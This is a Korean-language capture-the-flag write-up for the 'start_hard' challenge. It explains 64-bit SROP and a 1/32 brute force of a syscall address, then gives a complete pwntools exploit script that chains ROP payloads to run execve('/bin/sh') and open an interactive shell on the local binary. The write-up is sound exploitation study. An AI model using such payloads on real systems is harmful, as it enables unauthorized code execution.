start_hard-64비트 SROP, 브루트포스

start_hard

이 문제는 어..려....웠......다.......

주어진 것은 read함수 뿐!

먼저, 64비트는 int 80이 아닌 syscall을 쓰는 것을 몰랐었다.

->이후, syscall을 써야 함을 깨닫긴 했으나,

vsyscall에 있는 syscall을 사용하려 했다.->vsyscall은 마치 executable한 것 처럼 보이지만, 내부에서 엄청나게 복잡한 일이 벌어지면서

segmentation fault를 띄운다.

실함수 주소가 뒤12비트는 고정됨을 이용! 확률 1/32로 syscall 브루트 포싱!

64비트 SROP에서는 execve함수는 rax에 0x3b가 들어가고, rdi에 /bin/sh문자열 주소가 들어가면 된다!

from pwn import *

import time

syscallret=0xffffffffff600007

bss=0x601080

returnto=0x40052e

poprbxrbp12131415ret=0x4005ba

movedir15d=0x4005a6

sh1="\x2f\x62\x69\x6e\x00\x00\x00\x00"

sh2="\x2f\x73\x68\x00\x00\x00\x00\x00"

s=process('./start_hard')

#raw_input()

payload=""

payload+="a"*16

payload+=p64(0x601010)

payload+=p64(poprbxrbp12131415ret)

payload+=p64(0)

payload+=p64(1)

payload+=p64(0x601018)

payload+=p64(0)

payload+=p64(0)

payload+=sh1

payload+=p64(movedir15d)

payload+=p64(0)

payload+=p64(0x6010d0)

payload+=p64(bss)

payload+=p64(0)

payload+=p64(0)

payload+=p64(0)

payload+=p64(0)

payload+=p64(returnto)

s.send(payload+"\n")

time.sleep(1)

print("WAIT!")

payload2=""

payload2+="/sh\x00"

payload2+=p64(syscallret)

payload2+="b"*(16-len(payload2))

payload2+=p64(bss)

payload2+=p64(poprbxrbp12131415ret)

payload2+=p64(0)

payload2+=p64(1)

payload2+=p64(0x601018)

payload2+=p64(0x2)

payload2+=p64(0x601020)

payload2+=p64(0)

payload2+=p64(0x4005a0)

payload2+=p64(0)

payload2+=p64(0)

payload2+=p64(0x6010e0)

payload2+=p64(0x601020)

payload2+=p64(0)

payload2+=p64(0)

payload2+=p64(0x60106c)

payload2+=p64(0x400535)

s.send(payload2+"\n")

time.sleep(1)

print("WAIT")

imsi="\x15\xe2"

s.send(imsi)

time.sleep(1)

print("WAIT")

payload3=""

payload3+=p64(0)

payload3+=p64(0x400560)

payload3+=p64(0x601074)

payload3+=p64(0)

payload3+=p64(0)

payload3+=p64(0x60106c)

payload3+=p64(0x4005a0)

payload3+="\x2e"*(0x3a-len(payload3))

s.send(payload3+"\n")

time.sleep(1)

print("WAIT")

s.interactive()

s.close()